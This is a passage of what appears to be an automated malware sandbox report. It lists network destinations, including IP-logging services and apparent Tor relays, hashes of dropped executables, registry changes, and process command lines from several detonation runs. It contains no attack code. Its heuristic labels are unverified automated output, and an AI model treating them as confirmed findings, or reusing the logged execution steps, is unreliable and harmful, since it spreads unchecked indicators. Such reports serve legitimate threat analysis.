| RU | 87.240.132.67:80 | vk.com | tcp |
| US | 8.8.8.8:53 | x2.c.lencr.org | udp |
| RU | 87.240.132.67:80 | vk.com | tcp |
| RU | 87.240.132.67:80 | vk.com | tcp |
| RU | 87.240.132.67:80 | vk.com | tcp |
| RU | 87.240.132.67:80 | vk.com | tcp |
| GB | 2.19.169.32:80 | x2.c.lencr.org | tcp |
| RU | 87.240.132.67:80 | vk.com | tcp |
| US | 8.8.8.8:53 | 632432.site | udp |
| NL | 194.104.136.64:443 | 632432.site | tcp |
| RU | 87.240.132.67:80 | vk.com | tcp |
| RU | 87.240.132.67:80 | vk.com | tcp |
| US | 172.67.215.205:443 | acenitive.shop | tcp |
| KR | 211.119.84.111:80 | cczhk.com | tcp |
| US | 8.8.8.8:53 | carthewasher.net | udp |
| US | 172.67.161.113:443 | carthewasher.net | tcp |
| RU | 87.240.132.67:80 | vk.com | tcp |
| RU | 87.240.132.67:80 | vk.com | tcp |
| RU | 87.240.132.67:80 | vk.com | tcp |
| RU | 87.240.132.67:80 | vk.com | tcp |
| RU | 87.240.132.67:80 | vk.com | tcp |
| RU | 87.240.132.67:80 | vk.com | tcp |
| RU | 87.240.132.67:443 | vk.com | tcp |
| RU | 87.240.132.67:80 | vk.com | tcp |
| RU | 87.240.132.67:80 | vk.com | tcp |
| RU | 87.240.132.67:80 | vk.com | tcp |
| RU | 87.240.132.67:80 | vk.com | tcp |
| RU | 87.240.132.67:443 | vk.com | tcp |
| RU | 87.240.132.67:443 | vk.com | tcp |
| RU | 87.240.132.67:443 | vk.com | tcp |
| RU | 87.240.132.67:80 | vk.com | tcp |
| RU | 87.240.132.67:80 | vk.com | tcp |
| RU | 87.240.132.67:443 | vk.com | tcp |
| RU | 87.240.132.67:443 | vk.com | tcp |
| RU | 87.240.132.67:443 | vk.com | tcp |
| RU | 87.240.132.67:443 | vk.com | tcp |
| RU | 87.240.132.67:443 | vk.com | tcp |
| DE | 77.105.147.130:80 | 77.105.147.130 | tcp |
| US | 8.8.8.8:53 | iplis.ru | udp |
| US | 104.21.63.150:443 | iplis.ru | tcp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 104.21.4.208:443 | iplogger.org | tcp |
| DE | 185.172.128.24:80 | 185.172.128.24 | tcp |
| US | 8.8.8.8:53 | selebration17io.io | udp |
| RU | 91.215.85.120:80 | selebration17io.io | tcp |
| DE | 77.105.147.130:80 | 77.105.147.130 | tcp |
| US | 8.8.8.8:53 | api.myip.com | udp |
| US | 104.26.9.59:443 | api.myip.com | tcp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| NL | 195.20.16.46:80 | 195.20.16.46 | tcp |
| DE | 185.172.128.19:80 | 185.172.128.19 | tcp |
| FR | 91.121.181.6:9001 | | tcp |
| NL | 212.8.243.229:9001 | | tcp |
| DE | 185.213.155.169:5753 | | tcp |
| NL | 195.20.16.46:80 | 195.20.16.46 | tcp |
| NL | 195.20.16.46:80 | 195.20.16.46 | tcp |
| DE | 77.105.147.130:80 | 77.105.147.130 | tcp |
| NL | 185.227.82.7:443 | | tcp |
| US | 8.8.8.8:53 | iplis.ru | udp |
| US | 172.67.147.32:443 | iplis.ru | tcp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 104.21.4.208:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | trmpc.com | udp |
| ET | 196.188.169.138:80 | trmpc.com | tcp |
| US | 8.8.8.8:53 | en.bestsup.su | udp |
| US | 104.21.29.103:80 | en.bestsup.su | tcp |
| DE | 185.220.101.198:10198 | | tcp |
| DE | 193.23.244.244:443 | | tcp |
| NL | 94.142.241.226:9443 | | tcp |
| NL | 45.66.33.45:443 | | tcp |
| SG | 116.12.180.234:9443 | | tcp |
| SE | 171.25.193.9:80 | | tcp |
| FR | 141.145.201.126:9001 | | tcp |
| NL | 95.142.102.58:9001 | | tcp |
| NL | 95.142.102.58:9001 | | tcp |
| FR | 141.145.201.126:9001 | | tcp |
Files
memory/1728-0-0x0000000140000000-0x0000000140C54000-memory.dmp
memory/1728-1-0x0000000140000000-0x0000000140C54000-memory.dmp
memory/1728-2-0x00000000001E0000-0x00000000001E1000-memory.dmp
memory/1728-3-0x000007FEFD540000-0x000007FEFD5AC000-memory.dmp
memory/1728-4-0x000007FEFD540000-0x000007FEFD5AC000-memory.dmp
memory/1728-5-0x000007FEFD540000-0x000007FEFD5AC000-memory.dmp
memory/1728-6-0x00000000776D0000-0x0000000077879000-memory.dmp
memory/1728-8-0x0000000140000000-0x0000000140C54000-memory.dmp
memory/1728-7-0x000007FE80010000-0x000007FE80011000-memory.dmp
memory/1728-9-0x0000000140000000-0x0000000140C54000-memory.dmp
memory/1728-10-0x0000000140000000-0x0000000140C54000-memory.dmp
memory/1728-11-0x0000000140000000-0x0000000140C54000-memory.dmp
memory/1728-12-0x0000000140000000-0x0000000140C54000-memory.dmp
memory/1728-20-0x0000000140000000-0x0000000140C54000-memory.dmp
C:\Windows\System32\GroupPolicy\gpt.ini
| MD5 | 8ef9853d1881c5fe4d681bfb31282a01 |
| SHA1 | a05609065520e4b4e553784c566430ad9736f19f |
| SHA256 | 9228f13d82c3dc96b957769f6081e5bac53cffca4ffde0ba1e102d9968f184a2 |
| SHA512 | 5ddee931a08cfea5bb9d1c36355d47155a24d617c2a11d08364ffc54e593064011dee4fea8ac5b67029cab515d3071f0ba0422bb76af492a3115272ba8feb005 |
memory/1728-21-0x0000000140000000-0x0000000140C54000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Cab5784.tmp
| MD5 | ac05d27423a85adc1622c714f2cb6184 |
| SHA1 | b0fe2b1abddb97837ea0195be70ab2ff14d43198 |
| SHA256 | c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d |
| SHA512 | 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d |
C:\Users\Admin\AppData\Local\Temp\Tar57A7.tmp
| MD5 | 9c0c641c06238516f27941aa1166d427 |
| SHA1 | 64cd549fb8cf014fcd9312aa7a5b023847b6c977 |
| SHA256 | 4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f |
| SHA512 | 936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06 |
C:\Users\Admin\Documents\GuardFox\a0ffCtiHkAWh2WQD6jibWWLE.exe
| MD5 | f70724dd145654e1fe8d4544e05b9c54 |
| SHA1 | 4fb2592c0c7e6f6e58aa709967435e41ef29a73f |
| SHA256 | e1882cc622c67ef0378e84cc913b6103144dff644cb29a353061e47e8813cc55 |
| SHA512 | 1102f5a25aefa1acfff7efabc664e891cf2a9cadc5e50d825de1f998db65e64e6687ca2f2443354656cae4af74c58ef24cc2159632411c2d527feb1efb1b8c60 |
C:\Users\Admin\Documents\GuardFox\qkR4Fs3GyEEMio3bz99eB7ke.exe
| MD5 | 87cb105ea0c6229687819a5a774cdf20 |
| SHA1 | dc8b201b3c70183499a513c418244f467d8ed8e4 |
| SHA256 | 819a4f6d9ee90ee1f3c2503cc82ea0b6adaea72fc9a9aedd2a060099730493fb |
| SHA512 | 5bc547f9c860c0b35cc011d8fbd7ca018daf1a16c92543bee488ae707523710eec6643d199d42efaf82ced910c3cdbcebcb17ce046b052fc3dd78fd252b76b1b |
C:\Users\Admin\Documents\GuardFox\I6UCCRLwkIvkU0kr5pn9tAke.exe
| MD5 | b6ff38aefda8aa267c5999e22d36f106 |
| SHA1 | 15f1e1187d27e92388a5dfd27a9dc6adbd2861f5 |
| SHA256 | e171bce99a2b38e68a7cb57c530373cef59fa147aaaa795f6c4985b4dfe1d008 |
| SHA512 | ee7cf7d0788e14a9684af6f6a913b4b96072405ebf26cb648d16b90f16829e39a857430d24ff3fb4724e3a9b573677c4f4160b4875b5f47fab7aecc2a397b12e |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 77b27d4e0c3362a0523aa34d84f9d0b5 |
| SHA1 | fd589da7860f8c21385c825cc597c2744dfe348c |
| SHA256 | 82b1675e3b6375edfa034cfb6324fea2e16056fb54352da83b4c8d9d2079cc9f |
| SHA512 | 616ea3f40a20c4af2ba494595c25a13bf6d35f9e12e7c7aae9c4fd1ab33253e83b6bf4c7c506c17a69079363a19e7b518ee1da64045891b97ec675f00be0497a |
C:\Users\Admin\Documents\GuardFox\wD7ladKU51wCHrt1VQbncYVb.exe
| MD5 | 6696334ce6d64c354dac158b420146da |
| SHA1 | 7260dbbe814ae38cd4cc55f876b79f4b9bee282f |
| SHA256 | 78eb31482cff17c94e4dafecc3ceba9fac3951321cd9f292f750f37b1a7462ff |
| SHA512 | ebf2bac72d511038a9eee85ef88fd7011c3238b811f8b6cdd457b85aff1e648a903958d41420c2988d2f7e597e019dfcc0df5be405eca1dc38cfe86ac4d1b429 |
C:\Users\Admin\Documents\GuardFox\F6KP3rqn3LyQ85jnZsjhblYG.exe
| MD5 | 6e546e4dc5e888777a1955805cb680d6 |
| SHA1 | 4f2b2171ad451947a07d5fa15aa7a706397d6ace |
| SHA256 | 4e7eb5fcbb043183d3e5ed0d09db6d99bcf11b9e4bc232f90e33a9948e6166c1 |
| SHA512 | 3e70e488a7dedb8462591b55886c24a9b07ae4bcccae01a7fdd0cdb220772f2263c33d0d8ec9b789a2fe2a11e7355f3468a0c1326297dadd8c5670a14fa6891b |
C:\Users\Admin\Documents\GuardFox\oGELkeJJiv2cefOIHJeNoVfO.exe
| MD5 | 9eecbb5ad7d465190485a8cdb04cd406 |
| SHA1 | 7ccc8d9300163ec6bd0a3bf29900ed0a49fd1ecf |
| SHA256 | 88b54b8b78851084ff7e170ba52c51240d887606a26af3a6c62913804b3541a6 |
| SHA512 | 92c16c83836fc17b369760399920d67951797e228304a8ada9307dd9bef755c662168c1aa5e6b6f6c4a6ccebdb8d20ad8ddd9df8e34e79103eb081418ba87426 |
memory/1728-247-0x00000000001E0000-0x00000000001E1000-memory.dmp
memory/1728-246-0x0000000140000000-0x0000000140C54000-memory.dmp
memory/1728-242-0x0000000140000000-0x0000000140C54000-memory.dmp
C:\Users\Admin\Documents\GuardFox\hCzF7_6YmH1_yf7_aqOxLH8Z.exe
| MD5 | 4593a31c693b8f33b3eba02a7c60b848 |
| SHA1 | 61b6741d20f3a4676445d03e59bdbe3e6ec8d5bd |
Analysis: behavioral17
Detonation Overview
Submitted
2024-02-23 11:52
Reported
2024-02-23 11:58
Platform
win7-20240221-en
Max time kernel
118s
Max time network
129s
Command Line
Signatures
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
Processes
C:\Windows\system32\NOTEPAD.EXE
C:\Windows\system32\NOTEPAD.EXE C:\Users\Admin\AppData\Local\Temp\Resource\TypeSupport\Unicode\Mappings\win\CP1254.txt
Network
Files
Analysis: behavioral20
Detonation Overview
Submitted
2024-02-23 11:52
Reported
2024-02-23 11:57
Platform
win10v2004-20240221-en
Max time kernel
147s
Max time network
153s
Command Line
Signatures
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
Processes
C:\Windows\system32\NOTEPAD.EXE
C:\Windows\system32\NOTEPAD.EXE C:\Users\Admin\AppData\Local\Temp\Resource\TypeSupport\Unicode\Mappings\win\CP1257.txt
Network
Files
Analysis: behavioral22
Detonation Overview
Submitted
2024-02-23 11:52
Reported
2024-02-23 11:57
Platform
win10v2004-20240221-en
Max time kernel
149s
Max time network
154s
Command Line
Signatures
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
Processes
C:\Windows\system32\NOTEPAD.EXE
C:\Windows\system32\NOTEPAD.EXE C:\Users\Admin\AppData\Local\Temp\Resource\TypeSupport\Unicode\Mappings\win\CP1258.txt
Network
Files
Analysis: behavioral5
Detonation Overview
Submitted
2024-02-23 11:52
Reported
2024-02-23 11:58
Platform
win7-20240221-en
Max time kernel
119s
Max time network
129s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\ICQRT.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\ICQRT.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3000 -s 228
Network
Files
Analysis: behavioral15
Detonation Overview
Submitted
2024-02-23 11:52
Reported
2024-02-23 11:58
Platform
win7-20240221-en
Max time kernel
122s
Max time network
143s
Command Line
Signatures
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
Processes
C:\Windows\system32\NOTEPAD.EXE
C:\Windows\system32\NOTEPAD.EXE C:\Users\Admin\AppData\Local\Temp\Resource\TypeSupport\Unicode\Mappings\win\CP1253.txt
Network
Files
Analysis: behavioral13
Detonation Overview
Submitted
2024-02-23 11:52
Reported
2024-02-23 11:58
Platform
win7-20240221-en
Max time kernel
125s
Max time network
135s
Command Line
Signatures
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
Processes
C:\Windows\system32\NOTEPAD.EXE
C:\Windows\system32\NOTEPAD.EXE C:\Users\Admin\AppData\Local\Temp\Resource\TypeSupport\Unicode\Mappings\win\CP1252.txt
Network
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-02-23 11:52
Reported
2024-02-23 11:58
Platform
win7-20240221-en
Max time kernel
118s
Max time network
140s
Command Line
Signatures
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt.1\CLSID\ = "{73B24247-042E-4EF5-ADC2-42F62E6FD654}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\FLAGS\ = "0" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\InProcServer32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt.1\ = "MCLiteShellExt Class" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\TypeLib\ = "{346F8AC1-CEB1-4E3E-944B-87D9840505C3}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\ = "MIBLiteShellExt" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\NumMethods | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\NumMethods\ = "3" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\ICQLiteMenu | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt.1\CLSID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\InprocServer32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\HELPDIR | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\ = "IMCLiteShellExt" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt.1 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\0\win32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\CLSID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\ = "MCLiteShellExt Class" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\ProgID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\InprocServer32\ThreadingModel = "Apartment" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\ICQLiteMenu\ = "{73B24247-042E-4EF5-ADC2-42F62E6FD654}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\FLAGS | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ICQLiteShell.dll" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\InProcServer32\ThreadingModel = "Both" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\ProxyStubClsid32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ICQLiteShell.dll" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\ProxyStubClsid32\ = "{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\ProxyStubClsid32\ = "{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\ = "MCLiteShellExt Class" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\NumMethods | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\ProxyStubClsid32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\CurVer\ = "ICQLiteShell.MCLiteShellExt.1" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\VersionIndependentProgID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\ICQLiteMenu\ = "{73B24247-042E-4EF5-ADC2-42F62E6FD654}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\ProgID\ = "ICQLiteShell.MCLiteShellExt.1" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\CLSID\ = "{73B24247-042E-4EF5-ADC2-42F62E6FD654}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\TypeLib | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\ = "ICQLiteShell 1.0 Type Library" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\0 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\NumMethods\ = "7" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\ = "PSFactoryBuffer" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\ICQLiteMenu | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\CurVer | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\VersionIndependentProgID\ = "ICQLiteShell.MCLiteShellExt" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ICQLiteShell.dll" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2704 wrote to memory of 3032 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 2704 wrote to memory of 3032 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 2704 wrote to memory of 3032 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 2704 wrote to memory of 3032 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 2704 wrote to memory of 3032 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 2704 wrote to memory of 3032 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 2704 wrote to memory of 3032 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
Processes
C:\Windows\system32\regsvr32.exe
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\ICQLiteShell.dll
C:\Windows\SysWOW64\regsvr32.exe
/s C:\Users\Admin\AppData\Local\Temp\ICQLiteShell.dll
Network
Files
Analysis: behavioral8
Detonation Overview
Submitted
2024-02-23 11:52
Reported
2024-02-23 11:57
Platform
win10v2004-20240221-en
Max time kernel
150s
Max time network
154s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2132103209-3755304320-2959162027-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2132103209-3755304320-2959162027-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 179.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 177.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.73.42.20.in-addr.arpa | udp |
Files
Analysis: behavioral18
Detonation Overview
Submitted
2024-02-23 11:52
Reported
2024-02-23 11:58
Platform
win10v2004-20240221-en
Max time kernel
146s
Max time network
158s
Command Line
Signatures
